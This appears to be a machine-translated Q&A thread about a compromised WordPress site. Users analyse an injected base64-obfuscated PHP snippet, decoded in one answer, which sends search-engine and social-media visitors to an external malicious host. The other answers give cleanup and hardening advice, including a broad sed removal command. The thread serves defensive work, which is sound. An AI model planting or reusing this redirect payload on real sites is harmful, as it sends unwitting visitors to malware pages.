ワードプレスのウェブサイトComprimised Hack

Question

我々はクライアントのために実行しているWordPressのウェブサイトが妥協され、彼らがどのように入り込んでいるのかを確かめようとしている。彼らはE WPYコアファイル、プラグインファイルを選択します。

、彼らが使用したコードは次のとおりです。

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9")); 

誰もが前に見たり本のことを聞いていますか？どのようにこれが起こったかもしれないかの手掛かりは誰にもありますか？すべてのWPファイルのアクセス許可は推奨レベルに設定されています。

お時間をいただきありがとうございます。

Answer 1

私は先日この問題を抱えていました。sedはごみを取り除くのに非常に便利です。これは、すべてのPHPタグを開くときに自分自身に付いていて、行の最後にコードを残すことが多かったので、慎重な設定が必要でした。

私は、これはすべての後にsedで、これは私が使用するコマンドであると考えていますが、注意してください; - ）...

find . -name "*.php" -type f -exec sed -i 's/eval(.*));//' {} \; 

Answer 2

ので、以下のコードはブラックリストされたマルウェアにユーザーをリダイレクトしていますサイト？それはあなたが経験していることですか？

error_reporting(0); 
$qazplm=headers_sent(); 
if (!$qazplm){ 
    $referer=$_SERVER['HTTP_REFERER']; 
    $uag=$_SERVER['HTTP_USER_AGENT']; 
    if ($uag) { 
     if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { 
      if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ 
      header("Location: http://costabrava.bee.pl/"); 
      exit(); 
      } 
     } 
    } 
} 

あなたはXSSの脆弱性が高いと思われます。このリンクでは、このリンクで説明します。 http://www.ethicalhack3r.co.uk/security/wordpress-3-3-cross-site-scripting-xss/

どのバージョンを使用していますか？

Answer 3

これが起こった最も一般的な方法は、ファイルとフォルダのすべてを777に設定することです.wp-content/uploadsフォルダでこれを行う必要がある場合は、.htaccessスクリプトの実行を妨げる指令。ファイルとフォルダには、実行に必要な最小限の権限（ファイル644、フォルダ755）が必要です。

Answer 4

あなたはまた、完全にあなたのWPのコアまたはテンプレートファイルのいずれかにコードインジェクションをインストールし、防ぐきれいにするこれらのWPのリンクですべての命令を通過する必要があります。FAQ: My site was hacked « WordPress CodexとHow to completely clean your hacked wordpress installationとHow to find a backdoor in a hacked WordPressを参照してHardening WordPress « WordPress Codex.あなたのホストを知らせると、すべてのパスワードを変更します。ホストを変更する可能性もあります。一部の共有ホストは他の共有ホストよりも脆弱です。

これは、安価な共有ホストで脆弱なままにすることができる全体的なサーバーとWebホストのパラメータに依存するため、常に役に立ちませんが、.htaccessとwp-config.phpを保護するためにこれらを試すことができます。 .htaccess内の

<Files .htaccess> 
order deny,allow 
deny from all 
</Files> 

<Files wp-config.php> 
order allow,deny 
deny from all 
</Files> 

Answer 5

私はまったく同じ問題を抱えていました。

PHPコードを実行できるプラグインを1つ使用しているので、ウィジェットがウィジェットに感染していたようです。

私の最高のソリューションでした：

• 不審なウィジェットを排除します。
• 感染したファイル（私の場合：header.php）の時刻と日付を確認してください。
• 感染ファイルをすべて消去します（私の場合は、サイトのバックアップがあります）。
• その時点で不審なIPをログファイルに検索します（検索では、ブラックリストのIPアドレス ）。
• 不審なIPを禁止するプラグインを1つインストールします。

その瞬間から問題はなくなりました。